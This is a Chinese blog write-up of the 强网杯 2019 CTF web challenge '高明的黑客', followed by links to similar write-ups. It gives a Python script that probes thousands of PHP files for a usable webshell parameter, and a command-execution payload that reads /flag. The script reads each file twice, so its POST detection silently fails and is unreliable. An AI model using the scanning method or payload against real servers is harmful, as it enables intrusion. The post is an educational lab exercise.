[强网杯 2019]高明的黑客1

于 2024-08-05 17:18:48 发布
阅读量664 收藏 21
点赞数 11
文章标签: windows android
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/kw741951/article/details/140930991
版权

打开题目

先根据他的提示下载文件

打开文件发现

好多php文件

这里需要写python脚本来运行过滤文件了,参考了网上的脚本

import os
import requests
import re
import threading
import time
print('start:  '+  time.asctime( time.localtime(time.time()) ))
#输出当前日期时间
s1=threading.Semaphore(100)
#线程数100
filePath = r"E:\phpstudy\phpstudy_pro\WWW\src"
#为文件地址
os.chdir(filePath)
#改变当前工作目录到指定的路径
#本来的工作目录在D盘,修改到文件所在地址
requests.adapters.DEFAULT_RETRIES = 5
#连接失败后重连的次数为5次,因为如果线程如果太高,可能访问有时会报错
files = os.listdir(filePath)
#列出filePath路径下所有文件名
session = requests.Session()
#保持会话
session.keep_alive = False
#设置连接活跃状态为False
def get_content(file):
    s1.acquire()
#多个线程共同对某个数据修改,则可能出现不可预料的结果,为了保证数据的正确性,需要对多个线程进行同步。共享数据。
#比如a要访问flag这个参数,但b正在访问,那么先暂停a,等b执行完在执行a。
    print('trying   '+file+ '     '+ time.asctime( time.localtime(time.time()) ))
#输出时间
    with open(file,encoding='utf-8') as f:
#以utf-8打开文件
            gets = list(re.findall('\$_GET\[\'(.*?)\'\]', f.read()))
#全局正则匹配,读出当前文件的所有get参数
#\$对$转义\[、\'、\]同样是转义,(.*?)以非贪婪模式匹配\' \'内的所有字符串,并分组
            posts = list(re.findall('\$_POST\[\'(.*?)\'\]', f.read()))
#全局正则匹配,读出当前文件的所有post参数
    data = {}
    params = {}
#data数组存post参数值,params存get参数名
    for m in gets:
        params[m] = "echo 'xxxxxx';"
    for n in posts:
        data[n] = "echo 'xxxxxx';"
#把所有的get和post参数名以键名的方式赋给data和params,并赋值echo 'xxxxxx';
#赋值echo 'xxxxxx';是为了方便我们判断此参数有没有用。
    url = 'http://localhost/src/'+file
    req = session.post(url, data=data, params=params)
#会话方式,和requests.post访问查不多,但在这里会更快,它不需要不停重新访问。
#一次性请求所有的GET和POST
    req.close()
#关闭会话,释放内存
    req.encoding = 'utf-8'
    content = req.text
#得到所有访问的页面内容
    #print(content)
    if "xxxxxx" in content:
#如果发现存在,则继续挨个访问,并筛选出具体的参数
        flag = 0
#用来判断是get请求成功,则为1,是post成功则为0
        for a in gets:
            req = session.get(url+'?%s='%a+"echo 'xxxxxx';")
            content = req.text
            req.close()
            if "xxxxxx" in content:
                flag = 1
                break
        if flag != 1:
#如果此时flag不为1,则说明get所有参数都不存在
            for b in posts:
                req = session.post(url, data={b:"echo 'xxxxxx';"})
                content = req.text
                req.close()
                if "xxxxxx" in content:
                    break
        if flag == 1:
            param = a
#如果flag为1,则记录param为a,也就是此时get参数名
        else:
            param = b
        print('file: '+file+"  and param:%s" %param)
#输出成功的文件名和参数名
        print('endtime: ' + time.asctime(time.localtime(time.time())))
    s1.release()
    #释放锁,开始下一个线程

for i in files:
    t = threading.Thread(target=get_content, args=(i,))
    t.start()
#线程开始

运行结束得到

到本地试试

payload:xk0SzyKwfzw.php?Efa5BVG=cat%20/flag

得到flag

flag{29630141-e219-44a6-a8f4-71119541d92b}


 

worker..
关注
[强网 2019] web题-高明黑客
BROTHERYY的博客
07-08 1169
复现环境:buuoj.cn 下载下来的源码很大,大到让人傻掉 看了下大佬的wp 是说找出这些源码中所有的GET和POST请求,模拟请求一遍,看看那个能RCE能够使用。 这里贴出赵师傅的Python脚本 膜一波 import os import threading from concurrent.futures.thread import ThreadPoolExecutor import requests session = requests.Session() path = "/Users/ji
强网2019高明黑客&强网先锋上单)
kid的博客
05-30 5857
强网2019高明黑客&强网先锋上单)   前言 这里主要是对强网web中高明黑客和上单两道题进行一个复现回顾 再次感谢大佬提供的场景复现:https://www.zhaoj.in/read-5873.html   高明黑客 题目是先下载给出代码 比赛时拿到这道题一下就被打懵了 3000多个文件,打开还是奇奇怪怪得文件内容 当时是真不知道,怎么做 OK现在...
[强网 2019]高明黑客
pakho_C的博客
04-16 1220
web第42题 [强网 2019]高明黑客 打开靶场 根据提示下载备份文件 里面有几千个php文件 审计一下发现,很多类似于这种,有命令执行的可能,但是很多将参数置空了,无法利用,只能自己寻找可以利用的php文件,手动寻找不现实 ,只能编写脚本 学习大佬的脚本: 出处:[强网 2019]高明黑客(考察代码编写能力) import os import requests import re import threading import time print('开始时间: '+ time.asc
BUUctf 刷题之[强网 2019]高明黑客 1
dwrnxjlove的博客
08-09 1082
[强网 2019]高明黑客 1 打开题目之后是一段简单的话: 提示到网站的源码在www.tar.gz里,于是访问,下载网页源码,下载之后发现并不是网页源码,解压下载的文件发现里面有3000多个php文件,于是用D盾粗扫了一遍,发现全是报后门文件,但是尝试利用,发现前面一个文件都不能用,但是这3000多个文件必然有可以用的,于是就尝试进行文件遍历,找出可以利用的文件: 附上自己的脚本: import re import os import requests files = os.listdir(r'C
BUUCTF [强网 2019]高明黑客 writeup
qq_43054896的博客
03-06 532
打开链接,提示下载源码: http://f3e8019a-cd55-4b1e-a3dd-65d37019526a.node3.buuoj.cn/www.tar.gz 解压,里面3000多个php脚本,内容混乱,不过仔细看看,可以看到有GET和POST,还有eval,应该是木马脚本,那接下来就是要从3000+的脚本中找出可以使用的脚本。 将文件夹放在PHPstudy的网站根目录 /WWW 内,运行下...
[强网 2019]高明黑客 1
shinygod的博客
03-06 989
知识点:脚本编写能力 下载文件,并解压文件。 windows可以直接winrar解压,Linux:tar -xzvf file.tar.gz //解压tar.gz 有几千个文件随便访问 有一堆没用的参数,所以这题一个要从几千个文件找那个可以实现一句话木马的地方。 怎么用脚本实现呢?一头雾水,这边用别的师傅的脚本 import os import requests import re import threading import time print('start: '+ time.ascti
buuctf-web-[强网 2019]高明黑客1
mlws1900的博客
08-20 555
解题思路就是用get和post对所有文件进行挨个传参,一句话返回一个预定的值就利用该文件来获取flag。借其他大佬的脚本一用(跟扫目录返回状态码一个思路)直接复制www.tar.gz下载源码。打开发现很多个php文件。随机打开一个,观察源代码。利用以下payload。
web buu [强网 2019]高明黑客1
weixin_44214568的博客
03-30 435
考点:脚本编写 1.根据提示,查看源码 url+www.tar.gz,下载压缩包,发现是3002个php文件 随便打开一个发现里面有传参$_GET()函数,里面有的直接接了eval,相当于直接执行了参数里面的值,但是经过审计代码发现,里面的很多参数都已经在代码里被赋值,所以我们需要从三千多个文件里找到有用的$_GET(),很显然通过人工寻找有一定难度,那么就需要我们编写脚本 ...
BUUCTF[强网 2019]高明黑客
qq_44749590的博客
06-08 619
高明黑客BUUCTF
buuctf web [强网 2019]高明黑客
m0_46412682的博客
07-20 740
buuctf web [强网 2019]高明黑客 开始的页面 既然页面上有提示,我们就输入www.tar.gz 有文件压缩包,我们下载下来,压缩打开后,有几千个文件 这里我们随便打开一个文件,这里有很多shell,但是很多是用不了的,所以要用python来测试,不可能手动 import requests import os import re import threading import time session = requests.Session() session.keep_
BUUCTF WEB [强网 2019]高明黑客
A_dmin的博客
12-15 2470
BUUCTF WEB [强网 2019]高明黑客 打开网页,发现有提示~~源码可下 下载源码,发现3002个文件,查看一下,发现有不少的shell??? 不过都是不能用的,其实这道题目就是让我们找到能用的shell,考察的应该是脚本的编写能力吧!! 源码已经down下来了,在本地搭一个环境,php 7.0以上,否则会报语法错误! 然后编写脚本(特别慢): import requests ...
BUUCTF [强网 2019]高明黑客
qq_42158602的博客
01-14 1164
根据提示在url/www.tar.gz拿到源码 随便打开几个看看 有很多shell 不过都是些不能用的 由于文件太多还是些脚本跑吧 (python3) import os import re import requests from multiprocessing import Pool filePath = "E:\phpstudy_pro\WWW\src" url = "http://1...
[强网 2019]高明黑客(每日一题)
qq_51684648的博客
09-07 1235
[强网 2019]高明黑客(每日一题) 1,打开网页,发现提示,下载文件 2,发现了三千多个php文件,打开几个文件,发现有可以传参的地方,尝试传参,但命令并没有被执行。 [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-RfKq4Y6p-1631019565642)(https://i.loli.net/2021/09/07/yVeIzNdU5c8Ebar.png)] 3,猜测这三千多文件里有能被利用的shell,于是编写脚本尝试(我好菜,只能抄大佬们的脚本,在学了在学
脚本匹配get,post [强网 2019]高明黑客1
最新发布
m0_75178803的博客
02-29 518
打开题目访问www.tgr.gz,下载源码解压以后发现里面有很多文件,只有一个是index.html,其余都是php文件。并且尝试访问也有看大佬的wp是说,应该找存在形如以下的结构,传入payload找flag。步骤大致是字符匹配$_GET[$_POST[,尝试往匹配到的参数名传递echo,看看哪些参数可以接收到参数并打印出来。这里依旧是用大佬的脚本跑一下最终找到了利用文件: xk0SzyKwfzw.php找到了利用的参数:Efa5BVG命令执行, payload:得到flag。
2019强网_web_高明黑客
fly夏天的博客
10-22 1510
之前参加了2019强网,当时表现很菜,很多题都不会做。 后来发现buuoj.cn上有复现,以此重新复现一下这次的题目。 话不多说,开始今天的主题。 一访问页面就是如下画面: 因此我们直接访问 url/www.tar.gz即可下载获得源码。 打开压缩包,发现有3000多个php文件。 尝试搜索flag文件,未果。 打开php文件进行代码审计 发现代码中存在一些诸如这样的get或post参数会执行...
buuctf 高明黑客
07-28
buuctf 高明黑客是一个题目,其中提到了一个黑客使用的脚本来进行文件遍历和利用。该脚本下载了一个包含3000多个php文件的压缩文件,并尝试找出其中可以利用的文件。然而,该脚本在运行时遇到了一些问题,可能是由于电脑性能不足导致的。建议在本地环境搭建并运行该脚本,因为buu网站的安全性较低。脚本使用了一种技巧,即一次性请求所有的GET和POST请求。\[1\]\[2\]\[3\] #### 引用[.reference_title] - *1* [BUUctf 刷题之[强网 2019]高明黑客 1](https://blog.csdn.net/dwrnxjlove/article/details/119535138)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* [BUUCTF [强网 2019]高明黑客](https://blog.csdn.net/qq_42158602/article/details/103977841)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] - *3* [【BUUCTF】[强网 2019]高明黑客](https://blog.csdn.net/aoao331198/article/details/124431220)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值